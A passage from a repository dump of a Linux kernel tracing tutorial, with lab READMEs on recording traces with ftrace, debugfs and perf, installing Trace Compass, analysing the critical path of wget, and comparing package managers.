sched_wakeup \ 24 | -e softirq_entry -e softirq_raise -e softirq_exit -e irq_handler_entry -e irq_handler_exit \ 25 | -e block_rq_complete -e block_rq_insert -e block_rq_issue \ 26 | -e block_bio_frontmerge -e cpu_frequency \ 27 | -e net_dev_queue -e netif_receive_skb \ 28 | -e hrtimer_start -e hrtimer_cancel -e hrtimer_expire_entry -e hrtimer_expire_exit \ 29 | -e sys* \ 30 | wget https://lttng.org 31 | ``` 32 | 33 | - - - 34 | 35 | ### Task 3: Get the Trace For TraceCompass 36 | 37 | TraceCompass supports ftrace traces in textual raw format. To obtain a file that can be imported in Trace Compass, you execute the following command: 38 | 39 | ``` 40 | $ sudo trace-cmd report -R > myFtrace.txt 41 | ``` 42 | 43 | Then you can import `myFtrace.txt` in TraceCompass and it should be recognized as an ftrace trace. 44 | 45 | You can also import the binary trace directly, but only if `trace-cmd` is available on the machine where TraceCompass is. The ftrace binary format calls the `trace-cmd report -R` command to obtain the trace. It just avoids the user having to do the step above. 46 | 47 | - - - 48 | 49 | ### Task 4: Record a Trace With DebugFS 50 | 51 | If `trace-cmd` cannot be installed, it is possible to use ftrace directly in the debugfs. Here is how to obtain the same result as above: 52 | 53 | ```bash 54 | sudo mount -t debugfs nodev /sys/kernel/debug 55 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_wakeup/enable 56 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_switch/enable 57 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_waking/enable 58 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_pi_setprio/enable 59 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_process_fork/enable 60 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_process_exit/enable 61 | sudo echo 1 > /sys/kernel/debug/tracing/events/sched/sched_process_free/enable 62 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/softirq_raise/enable 63 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/softirq_entry/enable 64 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/softirq_exit/enable 65 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/irq_handler_entry/enable 66 | sudo echo 1 > /sys/kernel/debug/tracing/events/irq/irq_handler_exit/enable 67 | sudo echo 1 > /sys/kernel/debug/tracing/events/block/block_rq_complete/enable 68 | sudo echo 1 > /sys/kernel/debug/tracing/events/block/block_rq_insert/enable 69 | sudo echo 1 > /sys/kernel/debug/tracing/events/block/block_rq_issue/enable 70 | sudo echo 1 > /sys/kernel/debug/tracing/events/block/block_bio_frontmerge/enable 71 | sudo echo 1 > /sys/kernel/debug/tracing/events/power/cpu_frequency/enable 72 | sudo echo 1 > /sys/kernel/debug/tracing/events/net/net_dev_queue/enable 73 | sudo echo 1 > /sys/kernel/debug/tracing/events/net/netif_receive_skb/enable 74 | sudo echo 1 > /sys/kernel/debug/tracing/events/timer/hrtimer_start/enable 75 | sudo echo 1 > /sys/kernel/debug/tracing/events/timer/hrtimer_cancel/enable 76 | sudo echo 1 > /sys/kernel/debug/tracing/events/timer/hrtimer_expire_entry/enable 77 | sudo echo 1 > /sys/kernel/debug/tracing/events/timer/hrtimer_expire_exit/enable 78 | sudo echo 1 > /sys/kernel/debug/tracing/events/syscalls/enable 79 | sudo echo 1 > /sys/kernel/debug/tracing/tracing_on 80 | 81 | # Something to trace 82 | wget https://lttng.org 83 | 84 | sudo echo 0 > /sys/kernel/debug/tracing/tracing_on 85 | ``` 86 | 87 | Then, to obtain the trace to import in TraceCompass: 88 | 89 | ``` 90 | $ sudo cat /sys/kernel/debug/tracing/trace > myFtraceFile.txt 91 | ``` 92 | 93 | - - - 94 | 95 | #### Next 96 | 97 | * [Record kernel trace with perf](../005-record-kernel-trace-perf) to record a kernel trace with perf 98 | or 99 | * [Installing Trace Compass](../006-installing-tracecompass) to install the visualization tool 100 | or 101 | * [Back](../) for more options 102 | -------------------------------------------------------------------------------- /labs/005-record-kernel-trace-perf/README.md: -------------------------------------------------------------------------------- 1 | ## Record a Kernel Trace With Perf 2 | 3 | While this tutorial will mainly use LTTng for tracing, as it can provide both kernel and userspace traces, synchronized on the same time reference, it is also possible to get the same results for kernel tracing using `perf`. Like ftrace, perf has the advantage that it is builtin the linux kernel and many people are used to it. It can do both sampling or tracing, it is a very flexible tracer. In this lab, you will obtain a kernel trace that can then be analyzed by the visualization tools. 4 | 5 | *Note on perf*: The perf binary trace is _not_ readable by Trace Compass. It has to be converted to CTF. [CTF or Common Trace Format](http://diamon.org/ctf/), is a binary trace format, very flexible and fast to write. It is the format used by LTTng kernel and userspace traces. There is a perf2ctf converter built in perf, but it requires compilation of perf with `libbabeltrace`, a library providing an API to write CTF in C. Most distro do not have this option compiled in and compiling it yourself means compiling the linux kernel sources. Debian has it, but we know of no other distro with this feature. 6 | 7 | - - - 8 | 9 | ### Task 1: Record a Trace With Perf 10 | 11 | `perf` is a tool that can be used either for sampling, tracing or gathering performance counters. It is very flexible and can provide a lot of useful information. The [perf documentation](https://perf.wiki.kernel.org/index.php/Main_Page) contains exhaustive information on the various perf commands and option. 12 | 13 | Here, we will show how to trace the kernel events, so we can obtain a trace equivalent to the ftrace and lttng kernel traces. We will again trace the `ls` command and get its trace. 14 | 15 | ``` 16 | $ sudo perf record -a -e sched:sched_switch -e sched:sched_waking \ 17 | -e sched:sched_pi_setprio -e sched:sched_process_fork -e sched:sched_process_exit \ 18 | -e sched:sched_process_free -e sched:sched_wakeup \ 19 | -e irq:softirq_entry -e irq:softirq_raise -e irq:softirq_exit \ 20 | -e irq:irq_handler_entry -e irq:irq_handler_exit \ 21 | -e block:block_rq_complete -e block:block_rq_insert -e block:block_rq_issue \ 22 | -e block:block_bio_frontmerge -e power:cpu_frequency \ 23 | -e net:net_dev_queue -e net:netif_receive_skb \ 24 | -e timer:hrtimer_start -e timer:hrtimer_cancel -e timer:hrtimer_expire_entry -e timer:hrtimer_expire_exit \ 25 | -e syscalls:sys_enter_* -e syscalls:sys_exit_* \ 26 | wget https://lttng.org 27 | ``` 28 | 29 | - - - 30 | 31 | ### Task 2: Convert the Trace to CTF 32 | 33 | To open it in TraceCompass, the trace has to be converted to CTF. To do so, use the following command. 34 | 35 | ``` 36 | $ sudo perf data convert [--all] --to-ctf /path/to/ctf/folder 37 | ``` 38 | 39 | The `--all` option will also convert the mmap and mmap2 events used to map loaded libraries to the address spaces of processes. These events will all have a timestamp of 0 in the resulting trace, thus making the trace appear "longer" than it is. It is not necessary for kernel tracing, as mapping is not used, but for sampling, where symbols need to be resolved to the proper library/function, then it should be present to allow proper symbol resolution. 40 | 41 | If you get the following error message, then you're out of luck, the CTF conversion support is not compiled in. 42 | 43 | ``` 44 | No conversion support compiled in. perf should be compiled with environment variables LIBBABELTRACE=1 and LIBBABELTRACE_DIR=/path/to/libbabeltrace/ 45 | ``` 46 | 47 | You may use `lttng` or `ftrace` to obtain a kernel trace to visualize. 48 | 49 | - - - 50 | 51 | #### Next 52 | 53 | * [Installing Trace Compass](../006-installing-tracecompass) to install the visualization tool 54 | or 55 | * [Back](../) for more options 56 | -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/README.md: -------------------------------------------------------------------------------- 1 | ## Installing Trace Compass 2 | 3 | In this lab, you will install Trace Compass on the machine you'll use to view the traces. 4 | 5 | *Pre-requisites*: A viewing machine, it does not have to be a Linux machine. 6 | 7 | - - - 8 | 9 | ### Task 1: Install Java > 11 10 | 11 | Trace Compass is an Eclipse-based application and needs at least Java 11 to run. Make sure you have the correct version. 12 | 13 | ``` 14 | $ java -version 15 | openjdk version "11.0.11" 2021-04-20 16 | OpenJDK Runtime Environment (build 11.0.11+9-Ubuntu-0ubuntu2.18.04) 17 | OpenJDK 64-Bit Server VM (build 11.0.11+9-Ubuntu-0ubuntu2.18.04, mixed mode, sharing) 18 | ``` 19 | 20 | If the java command is not found or you have an older version of java installed, you need to install java. On an ubuntu machine, it would be 21 | 22 | ``` 23 | $ sudo apt-get install openjdk-11-jre 24 | $ java -version 25 | openjdk version "11.0.11" 2021-04-20 26 | OpenJDK Runtime Environment (build 11.0.11+9-Ubuntu-0ubuntu2.18.04) 27 | OpenJDK 64-Bit Server VM (build 11.0.11+9-Ubuntu-0ubuntu2.18.04, mixed mode, sharing) 28 | ``` 29 | 30 | If the version is still not correct, you may need to update your default java version using the following command 31 | 32 | ``` 33 | $ sudo update-alternatives --config java 34 | There are 2 choices for the alternative java (providing /usr/bin/java). 35 | 36 | Selection Path Priority Status 37 | ------------------------------------------------------------ 38 | * 0 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1101 auto mode 39 | 1 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java 1101 manual mode 40 | 2 /usr/lib/jvm/java-11-openjdk-amd64/jre/bin/java 1111 manual mode 41 | 42 | Press to keep the current choice[*], or type selection number: **2** 43 | ``` 44 | 45 | - - - 46 | 47 | In Windows and MacOs, download the jdk [here](https://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html) 48 | 49 | ### Task 2: Get Trace Compass 50 | 51 | Go to the [Trace Compass web site](http://tracecompass.org) and click on the big green button to download the latest release of Trace Compass. 52 | 53 | Then extract the content of the downloaded archive and simply start trace-compass from the extracted folder 54 | 55 | ``` 56 | $ cd ~/Downloads 57 | $ tar xf trace-compass-3.3.0-20180307-1910-linux.gtk.x86_64.tar.gz 58 | $ cd trace-compass 59 | $ ./tracecompass 60 | ``` 61 | 62 | You should reach an empty workspace. And voilà! You are now ready to import and analyze traces with Trace Compass. Proceed to other labs. 63 | 64 | ![empty workspace](screenshots/emptyWorkspace.png "Trace Compass empty workspace") 65 | 66 | - - - 67 | 68 | ### Task 3: Install the Required Add-Ons For This Tutorial 69 | 70 | Some labs in this tutorial require additional plugins that are not part of the main Trace Compass tool, but are available through the Trace Compass Incubator repo. We will add those required plugins now. 71 | 72 | To install the plugins, go to the *Tools* -> *Add-ons* 73 | 74 | ![Addons](screenshots/addons.png "Addons") 75 | 76 | A dialog will open with a list of plugins that can be installed. For this tutorial, we will needs the following: 77 | 78 | * **Generic Callstack (Incubator)**: For various labs 79 | * **Global Filters (Incubator)**: For various labs 80 | * **Trace Compass Scripting Javascript (Incubation)**: For scripting labs 81 | * **Trace Compass ftrace (Incubation)**: If you have system traces with ftrace 82 | * **Virtual Machine And Container Analysis (Incubator)**: For advanced topics with containers and virtual machine 83 | * **Trace Compass opentracing (Incubation)**: For advanced topic with opentracing 84 | 85 | Check those plugins in the *Install* wizard, as shown below. Then click *Finish* and follow the instructions on screen. Trace Compass will have to be restarted at the end of the process. 86 | 87 | ![AddonsGenericCallstack](screenshots/genericCallStackAddons.png "Addons GenericCallstack") 88 | 89 | - - - 90 | 91 | ### Task 4: Import the Traces For The Tutorial 92 | 93 | Each lab comes with the instructions to produce the traces yourself, so *if you plan on making your own traces, you may skip this step*. Otherwise, there is an [archive](../TraceCompassTutorialTraces.tgz) that contains all the traces for the labs. You may import it now. 94 | 95 | Upon opening Trace Compass, there is a default project named *Tracing* in the ``Project Explorer``, expand it and right-click on the *Traces* folder. Select *Import...* to open the *Trace Import* wizard. 96 | 97 | ![ImportTraceMenu](screenshots/importTraceMenu.png "Trace Compass Import Trace Menu") 98 | 99 | Check the *Select archive file* radio-button and find the archive you want to import. 100 | 101 | ![ImportTraceDialog](screenshots/importTraceDialog.png "Trace Compass Import Trace Dialog") 102 | 103 | The list on the left will show the folder structure inside that archive, you can select the top-level element and click *Finish*. Make sure the options are as shown above, ie the *Preserve folder structure* is **checked** and *Create experiment* is **unchecked**. 104 | 105 | All the traces should be available, each under a folder named for the lab that uses them. 106 | 107 | ![AllTracesJustImported](screenshots/tutorialTracesImported.png "Tutorial Traces Imported") 108 | 109 | - - - 110 | 111 | #### Next 112 | 113 | * [Trace Navigation in Trace Compass](../101-analyze-system-trace-in-tracecompass) 114 | or 115 | * [Back](../) for more options 116 | -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/addons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/addons.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/emptyWorkspace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/emptyWorkspace.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/genericCallStackAddons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/genericCallStackAddons.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/importTraceDialog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/importTraceDialog.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/importTraceMenu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/importTraceMenu.png -------------------------------------------------------------------------------- /labs/006-installing-tracecompass/screenshots/tutorialTracesImported.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/006-installing-tracecompass/screenshots/tutorialTracesImported.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/controlFlowView.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/controlFlowView.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/fullTimeScale.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/fullTimeScale.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/histogramTimeRanges.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/histogramTimeRanges.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/importTraceDialog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/importTraceDialog.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/importTraceMenu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/importTraceMenu.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/kernelTraceJustOpened.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/kernelTraceJustOpened.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/projectExplorerExpanded.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/projectExplorerExpanded.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/slowLs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/slowLs.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewFilter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewFilter.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewLegend.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewLegend.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewRemoveFilter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewRemoveFilter.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewSearch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/timeGraphViewSearch.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassCpuUsage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassCpuUsage.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassDiskActivity.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassDiskActivity.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassLatencyViews.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassLatencyViews.png -------------------------------------------------------------------------------- /labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassStatisticsView.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/101-analyze-system-trace-in-tracecompass/screenshots/traceCompassStatisticsView.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/README.md: -------------------------------------------------------------------------------- 1 | ## Tracing wget and showing the critical path 2 | 3 | In this lab, you will learn to view the critical path of a thread from the system's point of view, compare two executions of the same program and understand what is happening behind the scenes. In a program, a task may wait for something, for instance, the result of another task or the network. These wait dependencies are computed by the *OS Execution Graph* and can be seen using the critical path analysis. The critical path is the path that, if decreased, can decrease the duration of the application. 4 | 5 | ![KernelWaitAnalysisDjango](screenshots/kernelWaitAnalysisDjango.png "Trace Compass Kernel Wait Analysis") 6 | 7 | *Pre-requisites*: Have Trace Compass installed and opened. You can follow the [Installing TraceCompass](../006-installing-tracecompass/) lab or read the [TraceCompass web site](http://tracecompass.org) for more information. You also need to know how to record a trace and open it in Trace Compass. You can learn that by doing the [Record a kernel trace](../003-record-kernel-trace-lttng/) lab and the [Trace Navigation in Trace Compass](../101-analyze-system-trace-in-tracecompass/). 8 | 9 | - - - 10 | 11 | ### Task 1: Recording two executions of wget 12 | 13 | For this lab, we will look at 2 executions of the `wget` command. The traces can be recorded using [lttng-record-trace](https://github.com/tahini/lttng-utils) 14 | or lttng directly to trace the command: 15 | 16 | ``` 17 | $ lttng-record-trace wget http://www.dorsal.polymtl.ca 18 | ``` 19 | or 20 | ``` 21 | $ lttng create 22 | $ lttng enable-event -k -a 23 | $ lttng start 24 | $ wget http://www.dorsal.polymtl.ca 25 | $ lttng destroy 26 | ``` 27 | 28 | The 2 traces provided with this lab did the exact same query. The first one, in the `wget-first-call` trace took ~530 ms to complete, while the second one in `wget-second-call` took 10 times less. 29 | 30 | :question: What hypotheses can we make to explain the differences in the execution time of wget? 31 | 32 | - - - 33 | 34 | ### Task 2: Get the Critical Path Of The Trace 35 | 36 | We first need to open the critical path view, either by pressing `ctrl-3` and searching for `Critical Flow` view, or in the `Project Explorer` it would be under the `Views` element under the trace, `OS Execution Graph` -> `Critical Flow View`. 37 | 38 | Since we know which process we are interested in, we can search for it in the `Control Flow` view. We can hit the `ctrl-f` shortcut and type wget. 39 | 40 | ![SearchProcessTrace](screenshots/searchProcessTrace.png "Trace Compass Search Process") 41 | 42 | Once you have done that, you can right-click on the `wget` line and select `Follow wget/` where tid is the Thread ID of wget in your trace. As we can see, for this example, you would've selected `Follow wget/5628`. The `Follow ` means we are interested in additional information on this thread and it will trigger all analyses and actions that concerns a single thread. The *Critical Path* analysis is one of them. After executing, the result of the critical path should appear in the `Critical Flow` view. 43 | 44 | The first screenshot shows the full critical path and the second is zoomed in towards the beginning of the process. 45 | 46 | ![FollowProcess](screenshots/followProcess.png "Trace Compass Follow Process") 47 | 48 | ![FollowProcessZoom](screenshots/followProcessZoom.png "Trace Compass Follow Process") 49 | 50 | - - - 51 | 52 | ### Task 3: Understanding the Critical Path 53 | 54 | The `OS Execution Graph` analysis that is the base of the critical path computes the dependencies between the threads only from the kernel events. It will try to explain the causes of a thread being blocked by following what triggered the wakeup of the thread. For example, the reception of a network packet will cause a wakeup event for the thread that was waiting for this packet. So we can infer that the thread was blocked waiting for network. 55 | 56 | The `Critical Path` analysis starts from the end of the thread and moves back through the dependency chain to get the longest path of waiting for resources. It would find out if a process was waiting for a semaphore owned by another thread or if it was waiting on disk, etc. 57 | 58 | In the case of the `wget` critical path, there is no dependency with any other thread on the machine, as should be expected from such an application, so it looks like the line of the process of the `Control Flow` view, only that the **blocked** states are replaced by the reasons of the blocking. The following screenshot shows the legend of the `Critical Path` view. 59 | 60 | ![CriticalPathLegend](screenshots/criticalPathLegend.png "Critical Path Legend") 61 | 62 | We can understand from this that our `wget` thread had a period of unknown blocked states at the beginning, but the label of *nvme0q2* tells that it was waiting for the disk. And for the rest of the time, it was waiting for the network. 63 | 64 | - - - 65 | 66 | ### Task 4: Comparing two views 67 | 68 | :small_red_triangle_down: 69 | 70 | To compare two critical paths together, you need two `Critical Flow View` from the two traces. First, let's pin the view to one trace by clicking the down arrow next to the pin icon in the view. 71 | 72 | ![PinToFirstTrace](screenshots/pinToFirstTrace.png "Trace Compass Pin to First Trace") 73 | 74 | Then in the view menu, at the right of the toolbar, select `new view, pinned to `. 75 | 76 | ![NewViewPinnedToSecond](screenshots/newViewPinnedToSecond.png "Trace Compass New View Pinned to Second") 77 | 78 | To display the critical path of the second trace, you can repeat task 2 for the second trace. Now both `Critical Flow` views should be populated with their respective `wget` critical paths. 79 | 80 | :small_red_triangle: 81 | 82 | - - - 83 | 84 | ### Task 5: Critical path analysis 85 | 86 | You should now have the 2 critical paths side by side to compare their execution. 87 | 88 | We can see the time difference between the two executions by simply selecting the range of the process activity for each critical path. The time span will be displayed at the bottom of the window. 89 | 90 | ![MeasureTimeDifference](screenshots/measureTimeDifference.png "Trace Compass Measure Time Difference") 91 | 92 | We see that the second critical path does not have the access to disk that we see in the beginning of the first one. The network phase is also much longer the first time than the next one. 93 | 94 | We can thus answer our hypothesis from the beginning as to why there was a 10X time difference between the 2 executions: 95 | 96 | 1) For the first trace, the `wget` binary was fetched from disk, while it was already in memory the next time. 97 | 2) On the first query to the web page, the server probably had some setting up to do: Wake up a virtual machine on server? Fetch the page from disk? Cache the page? 98 | 99 | If we had a trace of the server side, we would be able to better understand the network latency. We will do that in an [advanced lab](../301-tracing-multiple-machines) later in this tutorial. 100 | 101 | - - - 102 | 103 | ### Conclusion 104 | 105 | In the lab, you've learned how to use Trace Compass to find and compare the critical path of some wget process executions. The critical path can help find the root cause of why a process is particularly slow, why it was blocked. 106 | 107 | - - - 108 | 109 | #### Next 110 | 111 | * [Compare Package Managers](../103-compare-package-managers) for hands-on experimentation of system traces. 112 | or 113 | * [System Tracing On Multiple Machines](../301-tracing-multiple-machines) to analyze this client trace with a server trace. 114 | or 115 | * [Back](../) for more options 116 | -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/compareCriticalPaths.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/compareCriticalPaths.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/criticalPathLegend.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/criticalPathLegend.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/followProcess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/followProcess.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/followProcessZoom.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/followProcessZoom.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/kernelWaitAnalysisDjango.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/kernelWaitAnalysisDjango.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/measureTimeDifference.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/measureTimeDifference.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/newViewPinnedToSecond.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/newViewPinnedToSecond.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/pinToFirstTrace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/pinToFirstTrace.png -------------------------------------------------------------------------------- /labs/102-tracing-wget-critical-path/screenshots/searchProcessTrace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/102-tracing-wget-critical-path/screenshots/searchProcessTrace.png -------------------------------------------------------------------------------- /labs/103-compare-package-managers/README.md: -------------------------------------------------------------------------------- 1 | ## Compare Package Managers 2 | 3 | In this lab, we will use kernel tracing to compare the behaviors of common utility that varies from linux distro to linux distro: package managers. They all do the same thing: install a package on the system, but they are quite different. You will also learn to search and filter in time graph views and make bookmarks to identify regions of interest in the trace. 4 | 5 | *Pre-requisites*: Have Trace Compass installed and opened. You can follow the [Installing TraceCompass](../006-installing-tracecompass/) lab or read the [TraceCompass web site](http://tracecompass.org) for more information. You should have done the [Trace Navigation in Trace Compass](../101-analyze-system-trace-in-tracecompass) and the [Wget Critical Path](../102-tracing-wget-critical-path) labs. 6 | 7 | - - - 8 | 9 | ### Task 1: Obtain the Traces 10 | 11 | Since most people have only one distro around them (though people reading this may be the type to have more), we have provided with this lab the necessary traces for some common package managers installing the `tree` package: `apt` (debian-flavor), `yum` (Red Hat flavor), `pacman` (Arch Linux) and `zypper` (OpenSuse). 12 | 13 | In TraceCompass, you can import the trace directly as an archive file. 14 | 15 | Right-click on the project's `Traces` folder in TraceCompass and click *Import*. The import wizard will open. Check the *Select archive file* radio-button and find the archive you want to import. 16 | 17 | The list on the left will show the folder structure inside that archive, you can select the top-level element and click *Finish* 18 | 19 | ![ImportArchive](screenshots/importArchive.png "Trace Compass Import Archive") 20 | 21 | You can also obtain your own trace for your favorite package manager with some variation on this command: 22 | 23 | ``` 24 | $ lttng-record-trace sudo apt-get install tree 25 | ``` 26 | 27 | Import the archive for each of the package manager, they should now appear under the `Traces` directory. 28 | 29 | Package managers are by default a bit verbose, so we can clearly follow the different phases of installing a package. For each trace, we will add the command that was executed to get it, along with its text output. By looking at the kernel trace, try to identify the various phases of the installation process. 30 | 31 | We'll try to identify a few common phases in each trace: 32 | 33 | * Getting package information (pre) 34 | * Downloading package (dl) 35 | * Unpacking (unpack) 36 | * Installing the package (inst) 37 | * Post-installation steps, setting up man pages (post) 38 | 39 | - - - 40 | 41 | ### Task 2: Observe apt 42 | 43 | First let's open the `apt` trace. We'll go into details for this first trace analysis. Then the subsequent traces will show mostly the results. 44 | 45 | The command that allowed to get this trace: 46 | 47 | ``` 48 | $ sudo apt install tree 49 | Reading package lists... Done 50 | Building dependency tree 51 | Reading state information... Done 52 | The following NEW packages will be installed: 53 | tree 54 | 0 upgraded, 1 newly installed, 0 to remove and 45 not upgraded. 55 | Need to get 46.1 kB of archives. 56 | After this operation, 106 kB of additional disk space will be used. 57 | Get:1 http://debian.bhs.mirrors.ovh.net/debian testing/main amd64 tree amd64 1.7.0-5 [46.1 kB] 58 | Fetched 46.1 kB in 0s (136 